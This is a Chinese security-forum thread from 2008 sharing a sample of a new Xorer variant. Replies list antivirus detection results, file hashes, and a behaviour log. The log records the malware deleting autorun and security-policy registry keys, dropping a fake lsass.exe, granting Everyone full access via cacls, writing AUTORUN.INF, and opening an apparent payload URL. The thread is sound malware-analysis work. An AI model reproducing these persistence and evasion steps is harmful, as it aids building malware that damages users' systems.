收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 比较新的磁碟机~ 过卡巴
1234下一页
返回列表 发新帖
楼主: will
 收起左侧

[病毒样本] 比较新的磁碟机~ 过卡巴

[复制链接]
BING126
头像被屏蔽
发表于 2008-2-1 21:46:21 | 显示全部楼层
McAfee  MISS
回复

举报

冷冷
发表于 2008-2-1 21:48:38 | 显示全部楼层
DR.WEB
lsass.exe;I:\virus\test\yimike;Trojan.Rox

ClamAV 白果
回复

举报

woai_jolin
发表于 2008-2-1 21:51:29 | 显示全部楼层
File yimike.rar received on 02.01.2008 14:31:46 (CET)
Current status: finished
Result: 13/32 (40.62%)

Compact
Print results



AntivirusVersionLast UpdateResult
AhnLab-V32008.2.1.112008.02.01-
AntiVir7.6.0.612008.02.01TR/Crypt.CFI.Gen
Authentium4.93.82008.01.31-
Avast4.7.1098.02008.02.01Win32:Agent-PPS
AVG7.5.0.5162008.02.01Generic9.AWMF
BitDefender7.22008.02.01-
CAT-QuickHeal9.002008.01.30-
ClamAV0.922008.02.01-
DrWeb4.44.0.091702008.02.01Trojan.Rox
eSafe7.0.15.02008.01.28suspicious Trojan/Worm
eTrust-Vet31.3.55022008.02.01-
Ewido4.02008.02.01-
FileAdvisor12008.02.01-
Fortinet3.14.0.02008.02.01-
F-Prot4.4.2.542008.02.01W32/BadBHO.A.gen!Eldorado
F-Secure6.70.13260.02008.02.01-
IkarusT3.1.1.202008.02.01Virus.Win32.Xorer.dr
Kaspersky7.0.0.1252008.02.01-
McAfee52202008.01.31-
Microsoft1.31092008.02.01Virus:Win32/Xorer.A
NOD32v228432008.02.01a variant of Win32/Xorer
Norman5.80.022008.01.31-
Panda9.0.0.42008.02.01Suspicious file
Prevx1V22008.02.01Heuristic: Suspicious File With Persistence
Rising20.29.22.002008.01.30-
Sophos4.25.02008.02.01W32/Xorer-B
Sunbelt2.2.907.02008.02.01-
Symantec102008.02.01-
TheHacker6.2.9.2032008.01.30-
VBA323.12.2.62008.01.31-
VirusBuster4.3.26:92008.01.31-
Webwasher-Gateway6.6.22008.02.01Trojan.Crypt.CFI.Gen
Additional information
File size: 87487 bytes
MD5: f07f69adff6c9831147d6b6d783944c0
SHA1: 3962d29ff464e41ca528c77f878703803ebf19e4
PEiD: -
packers: UPX
packers: UPX
packers: UPX
packers: PE_Patch.UPX, UPX
Prevx info: http://info.prevx.com/aboutprogr ... 1E726AAAC00670156B6


ATTENTION: VirusTotal is a free service offered by Hispasec Sistemas. There are no guarantees about the availability and continuity of this service. Although the detection rate afforded by the use of multiple antivirus engines is far superior to that offered by just one product, these results DO NOT guarantee the harmlessness of a file. Currently, there is not any solution that offers a 100% effectiveness rate for detecting viruses and malware.
回复

举报

欠妳緈諨
发表于 2008-2-1 21:52:04 | 显示全部楼层
avast!

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

IllusionWing
发表于 2008-2-1 21:53:42 | 显示全部楼层
报捆绑

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

hsp19871116
发表于 2008-2-1 22:08:00 | 显示全部楼层
蜘蛛抓了一个。
回复

举报

傻猪猪米走鸡
发表于 2008-2-1 22:13:57 | 显示全部楼层
ena报!
回复

举报

wangjay1980
发表于 2008-2-1 22:28:52 | 显示全部楼层
Hello.
New malicious software was found in the attached file.
It's detection will be included as soon as possible. Thank you for your help.
-----------------
Regards, Yury Nesmachny
Virus Analyst, Kaspersky Lab.

Ph.: +7(495) 797-8700
E-mail: newvirus@kaspersky.com
http://www.kaspersky.com   http://www.viruslist.com


> Attachment: yimike.rar
回复

举报

深红的雪
发表于 2008-2-1 22:29:33 | 显示全部楼层
跑了一下,行为基本上没有变化。

2008-02-01 21:47:40    删除注册表      操作:阻止
进程路径:D:\病毒样本\1sass.exe
注册表路径:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
注册表名称:[Key]

2008-02-01 21:47:53    删除注册表      操作:阻止
进程路径:D:\病毒样本\1sass.exe
注册表路径:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File
Execution Options
注册表名称:[Key]

2008-02-01 21:48:08    创建文件      操作:允许
进程路径:D:\病毒样本\1sass.exe
文件路径:C:\NetApi000.sys

2008-02-01 21:48:18    安装服务或者驱动      操作:阻止
进程路径:C:\WINDOWS\system32\services.exe
文件路径:C:\NetApi000.sys

2008-02-01 21:49:03    删除注册表      操作:阻止
进程路径:D:\病毒样本\1sass.exe
注册表路径:HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0
\Paths\{dda3f824-d8cb-441b-834d-be2efd2c1a33}
注册表名称:[Key]                                    删除此处几个键值可以破坏软件限制策略

2008-02-01 21:49:25    创建文件      操作:允许
进程路径:D:\病毒样本\1sass.exe
文件路径:C:\WINDOWS\System32\com\smss.exe

2008-02-01 21:49:28    创建文件      操作:允许
进程路径:D:\病毒样本\1sass.exe
文件路径:C:\WINDOWS\System32\com\netcfg.000

2008-02-01 21:49:31    创建文件      操作:允许
进程路径:D:\病毒样本\1sass.exe
文件路径:C:\WINDOWS\System32\com\netcfg.dll

2008-02-01 21:49:32    运行应用程序      操作:允许
进程路径:D:\病毒样本\1sass.exe
文件路径:C:\WINDOWS\System32\regsvr32.exe
命令行:C:\WINDOWS\System32\com\netcfg.dll /s       调用regsvr32.exe注册dll

2008-02-01 21:49:35    创建文件      操作:允许
进程路径:D:\病毒样本\1sass.exe
文件路径:C:\WINDOWS\System32\com\lsass.exe

2008-02-01 21:49:40    运行应用程序      操作:允许
进程路径:D:\病毒样本\1sass.exe
文件路径:C:\WINDOWS\System32\com\lsass.exe

2008-02-01 21:49:55    运行应用程序      操作:允许
进程路径:C:\WINDOWS\System32\com\lsass.exe
文件路径:C:\WINDOWS\System32\cacls.exe
命令行:C:\WINDOWS\System32\com\lsass.exe /e /t /g Everyone:F

2008-02-01 21:50:18    创建文件      操作:允许
进程路径:C:\WINDOWS\System32\com\lsass.exe
文件路径:C:\NetApi000.sys

2008-02-01 21:50:33    运行应用程序      操作:允许
进程路径:C:\WINDOWS\System32\com\lsass.exe
文件路径:C:\WINDOWS\System32\cmd.exe
命令行:/c echo ok

2008-02-01 21:50:42    运行应用程序      操作:允许
进程路径:C:\WINDOWS\System32\com\lsass.exe
文件路径:C:\WINDOWS\System32\cmd.exe
命令行:/c rd /s /q "C:\WINDOWS\System32\com\smss.exe"

2008-02-01 21:50:50    运行应用程序      操作:允许
进程路径:C:\WINDOWS\System32\com\lsass.exe
文件路径:C:\WINDOWS\System32\cmd.exe
命令行:/c rd /s /q "C:\WINDOWS\System32\com\lsass.exe"

2008-02-01 21:50:56    运行应用程序      操作:允许
进程路径:C:\WINDOWS\System32\com\lsass.exe
文件路径:C:\WINDOWS\System32\cmd.exe
命令行:/c rd /s /q "C:\WINDOWS\System32\com\netcfg.000"

2008-02-01 21:51:03    运行应用程序      操作:允许
进程路径:C:\WINDOWS\System32\com\lsass.exe
文件路径:C:\WINDOWS\System32\cmd.exe
命令行:/c rd /s /q "C:\WINDOWS\System32\com\netcfg.dll"

2008-02-01 21:51:23    创建文件      操作:允许
进程路径:C:\WINDOWS\System32\com\lsass.exe
文件路径:C:\WINDOWS\System32\dnsq.dll

2008-02-01 21:51:25    安装全局钩子      操作:阻止
进程路径:C:\WINDOWS\System32\com\lsass.exe
文件路径:C:\WINDOWS\System32\dnsq.dll

2008-02-01 21:52:21    修改文件      操作:阻止
进程路径:C:\WINDOWS\System32\com\lsass.exe
文件路径:E:\SUPPORT\TOOLS\README.HTM                         修改HTM文件

2008-02-01 21:52:44    运行应用程序      操作:允许
进程路径:C:\WINDOWS\System32\com\lsass.exe
文件路径:C:\WINDOWS\System32\cmd.exe
命令行:/c rd /s /q "C:\WINDOWS\System32\com\bak"

2008-02-01 21:52:44    删除文件      操作:阻止
进程路径:C:\WINDOWS\System32\cmd.exe
文件路径:C:\WINDOWS\system32\Com\bak

2008-02-01 21:52:44    创建文件      操作:阻止
进程路径:C:\WINDOWS\System32\com\lsass.exe
文件路径:C:\AUTORUN.INF

2008-02-01 21:53:21    运行应用程序      操作:允许
进程路径:C:\WINDOWS\System32\cmd.exe
文件路径:C:\WINDOWS\System32\com\smss.exe
命令行:C:\WINDOWS\System32\com\lsass.exe|D:\pagefile.pif

2008-02-01 21:54:40    运行应用程序      操作:允许
进程路径:C:\WINDOWS\System32\com\lsass.exe
文件路径:C:\WINDOWS\System32\ping.exe
命令行:-f -n 1 www.baidu.com                                检查是否有联网

2008-02-01 21:54:45    运行应用程序      操作:允许
进程路径:C:\WINDOWS\System32\com\lsass.exe
文件路径:c:\program files\internet explorer\iexplore.exe
命令行:http://w.c0mo.com/r.htm

[ 本帖最后由 rappar 于 2008-2-11 17:04 编辑 ]
回复

举报

wjzdw
发表于 2008-2-1 22:45:42 | 显示全部楼层
.................................................................
瑞星大大出磁碟机专杀了
回复

举报

下一页 »
1234下一页
返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-5-18 10:50 , Processed in 0.091540 second(s), 15 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表